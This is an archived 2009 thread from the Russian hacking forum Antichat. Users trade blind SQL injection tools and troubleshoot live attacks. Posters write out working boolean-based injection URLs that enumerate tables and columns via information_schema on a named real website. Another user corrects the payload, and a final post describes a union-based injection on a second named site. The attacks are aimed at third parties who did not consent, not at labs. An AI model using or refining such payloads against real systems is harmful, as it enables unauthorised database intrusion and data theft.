ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
30.05.2009, 23:15
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
кто нибудь дайте линк на словари таблиц на Mysql. Раньше юзал но шас хз не помню
|
|
|
30.05.2009, 23:58
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
|
|
|
|
31.05.2009, 08:29
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
спс у меня sipt4 есть, но как раз для него ещу дополнително
|
|
|
|
31.05.2009, 00:05
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695
Репутация:
19
|
|
Посоветуйте какую-нить прогу для Blind sql inj.... Архив Grey'a выдает CRC Еррор  |
|
|
|
31.05.2009, 02:14
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от DeepXhadow
Посоветуйте какую-нить прогу для Blind sql inj.... Архив Grey'a выдает CRC Еррор Скрипт от Грея
залил
_http://www.sendspace.com/file/6e3r62
а вообще..ещё посоветую bsqlbf
|
|
|
|
31.05.2009, 01:56
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Неужели в гугле не найти?
Тот же sipt4..
|
|
|
|
31.05.2009, 13:58
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695
Репутация:
19
|
|
blind sql inj
Сообщение от R1dex
Неужели в гугле не найти?
Тот же sipt4..
Нету в сипте 4 посимвольного брута....
Еще вопрос по blind...
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1,1),1,1))>=1--
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1,1),1,1))>=200--
Видно что вывод разный, написал кое-как кривой скрипт, сдампил таблицы...
терь вопрос почему
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x276E65777327),1,1))>=1--
и
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x276E65777327),1,1))>=200--
Возвращают одинаковые результаты...
таблица 0x276E65777327=news точно есть, т к
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+*+FROM+news),1,1))>=1--
|
|
|
|
31.05.2009, 14:04
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2DeepXhadow как нет посимвольного брута в сипт4?
select+table_name+from+information_schema.tables+l imit+{N16-300},1
|
|
|
|
31.05.2009, 14:35
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969
Репутация:
169
|
|
DeepXhadow
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6E657773+limit+1,1),1,1))>=1--
1) При выводе колонок тоже нужен limit;
2) Хексить нужно значение без кавычек, т.е. news=0x6e657773, а не 0x276E65777327. |
|
|
|
01.06.2009, 00:07
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Есть инъекция, число колонок то я нашел, но дальше при выполнения запроса
http://www.clavesin.ru/addcard?dataID=-1227+union+select+1,2,3
происходит редирект. Что с этим можно сделать, кроме как посимвольно брутить?
Последний раз редактировалось nemaniak; 01.06.2009 в 00:10..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|
Похожие темы
Комбинированный вид